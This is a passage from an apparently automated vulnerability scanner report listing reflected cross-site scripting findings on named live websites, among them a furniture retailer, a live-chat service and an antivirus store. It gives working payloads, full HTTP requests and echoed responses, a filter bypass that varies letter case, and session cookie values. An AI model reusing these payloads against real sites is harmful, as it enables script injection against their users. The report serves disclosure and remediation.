HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 12:03:43 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384f20b9ffb48ea05c5; path=/ Vary: User-Agent Content-Length: 32002
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
3.412. http://www.hertzfurniture.com/search.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.hertzfurniture.com
Path: /search.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9483f</script><img%20src%3da%20onerror%3dalert(1)>812974d48dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9483f</script><img src=a onerror=alert(1)>812974d48dc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search.php?find-box=xss%20chair%20desk%20s/9483f</script><img%20src%3da%20onerror%3dalert(1)>812974d48dchoes HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.hertzfurniture.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; kmCheck=dbea8e4a771c4c48955cb1cc99feb873; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|Referrer information not available|Raw Query not available; WRUID=410325474.977200202; IPE35522=IPE35522; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.6.9.1317384700238; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 12:34:22 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384f20b9ffb48ea05c5; path=/ Vary: User-Agent Content-Length: 32006
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
}); $("form#pagination").submit( function(event) { return false; }); }); var _urlSearch = "/search.php"; var _historyParam = "n6loegij||find-box~xss chair desk s/9483f</script><img src=a onerror=alert(1)>812974d48dchoes"; var _gaParamA = { 'gv' : '20', 'pg' : '1'}; function getHistory() { return _historyParam; } function getHMGa() { //HtzMrc GA var ga_param = ''; //need 'pg' first if (_gaParam ...[SNIP]...
3.413. http://www.hertzfurniture.com/search.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.hertzfurniture.com
Path: /search.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload ebe6f--><img%20src%3da%20onerror%3dalert(1)>1f2c956f488 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ebe6f--><img src=a onerror=alert(1)>1f2c956f488 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /search.php?find-box=xss%20chair%20desk%20s/ebe6f--><img%20src%3da%20onerror%3dalert(1)>1f2c956f488hoes HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.hertzfurniture.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; kmCheck=dbea8e4a771c4c48955cb1cc99feb873; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|Referrer information not available|Raw Query not available; WRUID=410325474.977200202; IPE35522=IPE35522; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.6.9.1317384700238; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 12:03:59 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384c75445a36c37a16a; path=/ Vary: User-Agent Content-Length: 31956
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The value of the CatID request parameter is copied into an HTML comment. The payload e0e39--><script>alert(1)</script>628b8cd7651 was submitted in the CatID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of the CatID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9e71'%3balert(1)//10395de5436 was submitted in the CatID parameter. This input was echoed as b9e71';alert(1)//10395de5436 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the CatID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f3b9"><script>alert(1)</script>00d7deeb61e was submitted in the CatID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the d request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 625df"%3balert(1)//6bec7c98aa2 was submitted in the d parameter. This input was echoed as 625df";alert(1)//6bec7c98aa2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /lhn/scripts/lhnvisitor.aspx?div=&zimg=1602&lhnid=6674&iv=1&iwidth=153&iheight=52&zzwindow=0&d=0625df"%3balert(1)//6bec7c98aa2&custom1=&custom2=&custom3= HTTP/1.1 Host: www.livehelpnow.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: */* Referer: http://posnation.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the iheight request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4de7b"%3balert(1)//82e30231328 was submitted in the iheight parameter. This input was echoed as 4de7b";alert(1)//82e30231328 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /lhn/scripts/lhnvisitor.aspx?div=&zimg=1602&lhnid=6674&iv=1&iwidth=153&iheight=524de7b"%3balert(1)//82e30231328&zzwindow=0&d=0&custom1=&custom2=&custom3= HTTP/1.1 Host: www.livehelpnow.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: */* Referer: http://posnation.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the iheight request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8d420'%3balert(1)//1ab9180e9c8 was submitted in the iheight parameter. This input was echoed as 8d420';alert(1)//1ab9180e9c8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /lhn/scripts/lhnvisitor.aspx?div=&zimg=1602&lhnid=6674&iv=1&iwidth=153&iheight=528d420'%3balert(1)//1ab9180e9c8&zzwindow=0&d=0&custom1=&custom2=&custom3= HTTP/1.1 Host: www.livehelpnow.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: */* Referer: http://posnation.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
var lhnTrack=''; var blhnInstalled=0; if (typeof lhnInstalled !='undefined'){lhnTrack='f';blhnInstalled=1;} var lhnInstalled=1; var InviteRepeats; var zbrepeat=1; var bInvited=0; var bLHNOnli ...[SNIP]... + ',top=' + wtop + ',width=580,height=435,toolbar=no,location=no,directories=no,status=yes,menubar=no,scrollbars=no,copyhistory=no,resizable=yes'); }
Zslide(); }
if (('153'!='') && ('528d420';alert(1)//1ab9180e9c8'!='')) { if (document.location.protocol=='https:') { document.write("<a href=\"#\" onclick=\"OpenLHNChat();return false;\"> ...[SNIP]...
The value of the iwidth request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 24a9d'%3balert(1)//12dd260b5d was submitted in the iwidth parameter. This input was echoed as 24a9d';alert(1)//12dd260b5d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /lhn/scripts/lhnvisitor.aspx?div=&zimg=1602&lhnid=6674&iv=1&iwidth=15324a9d'%3balert(1)//12dd260b5d&iheight=52&zzwindow=0&d=0&custom1=&custom2=&custom3= HTTP/1.1 Host: www.livehelpnow.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: */* Referer: http://posnation.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
var lhnTrack=''; var blhnInstalled=0; if (typeof lhnInstalled !='undefined'){lhnTrack='f';blhnInstalled=1;} var lhnInstalled=1; var InviteRepeats; var zbrepeat=1; var bInvited=0; var bLHNOnli ...[SNIP]... eft=' + wleft + ',top=' + wtop + ',width=580,height=435,toolbar=no,location=no,directories=no,status=yes,menubar=no,scrollbars=no,copyhistory=no,resizable=yes'); }
Zslide(); }
if (('15324a9d';alert(1)//12dd260b5d'!='') && ('52'!='')) { if (document.location.protocol=='https:') { document.write("<a href=\"#\" onclick=\"OpenLHNChat();return false;\"> ...[SNIP]...
The value of the iwidth request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d986e"%3balert(1)//33c82be1078 was submitted in the iwidth parameter. This input was echoed as d986e";alert(1)//33c82be1078 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /lhn/scripts/lhnvisitor.aspx?div=&zimg=1602&lhnid=6674&iv=1&iwidth=153d986e"%3balert(1)//33c82be1078&iheight=52&zzwindow=0&d=0&custom1=&custom2=&custom3= HTTP/1.1 Host: www.livehelpnow.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: */* Referer: http://posnation.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the lhnid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 43ce9%3balert(1)//7a45b0cc4f0 was submitted in the lhnid parameter. This input was echoed as 43ce9;alert(1)//7a45b0cc4f0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /lhn/scripts/lhnvisitor.aspx?div=&zimg=1602&lhnid=667443ce9%3balert(1)//7a45b0cc4f0&iv=1&iwidth=153&iheight=52&zzwindow=0&d=0&custom1=&custom2=&custom3= HTTP/1.1 Host: www.livehelpnow.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: */* Referer: http://posnation.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the lhnid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31c90"%3balert(1)//d2dc7402ec7 was submitted in the lhnid parameter. This input was echoed as 31c90";alert(1)//d2dc7402ec7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /lhn/scripts/lhnvisitor.aspx?div=&zimg=1602&lhnid=667431c90"%3balert(1)//d2dc7402ec7&iv=1&iwidth=153&iheight=52&zzwindow=0&d=0&custom1=&custom2=&custom3= HTTP/1.1
Host: www.livehelpnow.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://posnation.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
var lhnTrack=''; var blhnInstalled=0; if (typeof lhnInstalled !='undefined'){lhnTrack='f';blhnInstalled=1;} var lhnInstalled=1; var InviteRepeats; var zbrepeat=1; var bInvited=0; var bLHNOnli ...[SNIP]... <img style='position:absolute;top:-5000px;left:-5000px;' width='1' height='1' src='https://www.livehelpnow.net/lhn/jsutil/showninvitationmessage.aspx?iplhnid=50.23.123.106|667431c90";alert(1)//d2dc7402ec7|9/30/2011 8:25:13 AM' /> ...[SNIP]...
The value of the zimg request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 30155%3balert(1)//b4ab12f6b54 was submitted in the zimg parameter. This input was echoed as 30155;alert(1)//b4ab12f6b54 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /lhn/scripts/lhnvisitor.aspx?div=&zimg=160230155%3balert(1)//b4ab12f6b54&lhnid=6674&iv=1&iwidth=153&iheight=52&zzwindow=0&d=0&custom1=&custom2=&custom3= HTTP/1.1
Host: www.livehelpnow.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://posnation.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the zzwindow request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98172'%3balert(1)//09425fa3c1e was submitted in the zzwindow parameter. This input was echoed as 98172';alert(1)//09425fa3c1e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /lhn/scripts/lhnvisitor.aspx?div=&zimg=1602&lhnid=6674&iv=1&iwidth=153&iheight=52&zzwindow=098172'%3balert(1)//09425fa3c1e&d=0&custom1=&custom2=&custom3= HTTP/1.1
Host: www.livehelpnow.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://posnation.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
var lhnTrack=''; var blhnInstalled=0; if (typeof lhnInstalled !='undefined'){lhnTrack='f';blhnInstalled=1;} var lhnInstalled=1; var InviteRepeats; var zbrepeat=1; var bInvited=0; var bLHNOnli ...[SNIP]... < millis); }
if (blhnInstalled==0) { var lhnjava; var lhnreg = new RegExp('/'); var lhnreferrer = escape(document.referrer); var lhnwindow='098172';alert(1)//09425fa3c1e';
var lhnpagetitle=(document.title.length> ...[SNIP]...
3.426. http://www.mcafeestore.com/store [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.mcafeestore.com
Path: /store
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 97f5c--><script>alert(1)</script>80c456126cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=64806100151,0)
Date: Fri, 30 Sep 2011 12:01:43 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc1app65
Content-Length: 27266
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head> <!--!esi:include src="/esi?Sit ...[SNIP]... <!--!esi:include src="/store?97f5c--><script>alert(1)</script>80c456126cf=1&Action=DisplayESIPage&Currency=GBP&ESIHC=9e374b31&Env=BASE&Locale=en_GB&SiteID=mfe&StyleID=25180600&StyleVersion=30&ceid=176851100&cename=TopHeader&id=HomeOffersPage"--> ...[SNIP]...
3.427. http://www.mcafeestore.com/store/mfe/DisplayHomePage [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.mcafeestore.com
Path: /store/mfe/DisplayHomePage
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 3a25b--><script>alert(1)</script>20333834b39 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /store/mfe/DisplayHomePage?3a25b--><script>alert(1)</script>20333834b39=1 HTTP/1.1
Host: www.mcafeestore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=172182913173,0)
Content-Length: 27309
Date: Fri, 30 Sep 2011 12:44:32 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc1app67
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head> <!--!esi:include src="/esi?Sit ...[SNIP]... <!--!esi:include src="/store?3a25b--><script>alert(1)</script>20333834b39=1&Action=DisplayESIPage&Currency=GBP&ESIHC=4b937cbd&Env=BASE&Locale=en_GB&SiteID=mfe&StyleID=25180600&StyleVersion=30&ceid=176851100&cename=TopHeader&id=HomeOffersPage&script> ...[SNIP]...
3.428. http://www.mcafeestore.com/store/mfe/DisplayHomePage/locale.da_DK/Currency.DKK [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload b0da8--><script>alert(1)</script>3eb6e67c250 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /store/mfe/DisplayHomePage/locale.da_DK/Currency.DKK?b0da8--><script>alert(1)</script>3eb6e67c250=1 HTTP/1.1
Host: www.mcafeestore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=21859114603,0)
Content-Length: 22351
Date: Fri, 30 Sep 2011 12:45:27 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc1app67
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="da" lang="da"> <head> <!--!esi:include src="/esi?Sit ...[SNIP]... <!--!esi:include src="/store?Action=DisplayESIPage&Currency=DKK&ESIHC=c4711e3e&Env=BASE&Locale=da_DK&SiteID=mfe&StyleID=25691600&StyleVersion=17&b0da8--><script>alert(1)</script>3eb6e67c250=1&ceid=176851100&cename=TopHeader&id=HomeOffersPage&script> ...[SNIP]...
3.429. http://www.mcafeestore.com/store/mfe/DisplayHomePage/locale.da_DK/Currency.DKK%20 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload e9f62--><script>alert(1)</script>3b66fc163e6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /store/mfe/DisplayHomePage/locale.da_DK/Currency.DKK%20?e9f62--><script>alert(1)</script>3b66fc163e6=1 HTTP/1.1
Host: www.mcafeestore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=21859104265,0)
Content-Length: 22379
Date: Fri, 30 Sep 2011 12:45:18 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc1app67
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="da" lang="da"> <head> <!--!esi:include src="/esi?Sit ...[SNIP]... <!--!esi:include src="/store?Action=DisplayESIPage&Currency=DKK&Currency=DKK+&ESIHC=c4711e3e&Env=BASE&Locale=da_DK&SiteID=mfe&StyleID=25691600&StyleVersion=17&ceid=176851100&cename=TopHeader&e9f62--><script>alert(1)</script>3b66fc163e6=1&id=HomeOffersPage&script> ...[SNIP]...
3.430. http://www.mcafeestore.com/store/mfe/DisplayHomePage/locale.de_DE [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.mcafeestore.com
Path: /store/mfe/DisplayHomePage/locale.de_DE
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 9a012--><script>alert(1)</script>4b5e159ff0c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /store/mfe/DisplayHomePage/locale.de_DE?9a012--><script>alert(1)</script>4b5e159ff0c=1 HTTP/1.1
Host: www.mcafeestore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=137823220027,0)
Content-Length: 24232
Date: Fri, 30 Sep 2011 12:45:16 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc1app67
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="de" lang="de"> <head> <!--!esi:include src="/esi?Sit ...[SNIP]... <!--!esi:include src="/store?9a012--><script>alert(1)</script>4b5e159ff0c=1&Action=DisplayESIPage&Currency=EUR&ESIHC=c4711e3e&Env=BASE&Locale=de_DE&SiteID=mfe&StyleID=25691100&StyleVersion=20&ceid=176851100&cename=TopHeader&id=HomeOffersPage&script> ...[SNIP]...
3.431. http://www.mcafeestore.com/store/mfe/DisplayHomePage/locale.en_AU/Currency.AUD [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload a1803--><ScRiPt>alert(1)</ScRiPt>90a9b8ecfa6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /store/mfe/DisplayHomePage/locale.en_AU/Currency.AUD?a1803--><ScRiPt>alert(1)</ScRiPt>90a9b8ecfa6=1 HTTP/1.1
Host: www.mcafeestore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=189362801782,0)
Content-Length: 22022
